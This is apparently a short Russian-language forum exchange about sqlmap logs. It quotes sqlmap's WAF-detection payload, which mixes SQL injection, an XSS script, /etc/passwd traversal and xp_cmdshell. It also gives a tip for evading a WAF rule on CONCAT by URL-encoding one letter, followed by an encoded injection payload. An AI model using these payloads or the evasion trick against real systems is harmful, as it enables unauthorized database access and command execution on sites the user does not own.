Этот запрос исключительно для детекта WAF на таргете, тамперы не заменяют в нем пейлоад. Это нормально.[03:16:05] [PAYLOAD] 4522 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
Тут триггер конкретно на CONCAT. Достаточно перевести первую букву в урл энкод %A0%43ONCAT и триггера нет. Че сам то не пробуешь обходить?[03:19:30] [PAYLOAD] (%A0SELECT %A0CONCAT(0x71766b6271,(%A0ELT(7032=7032,1)),0x716b707a71))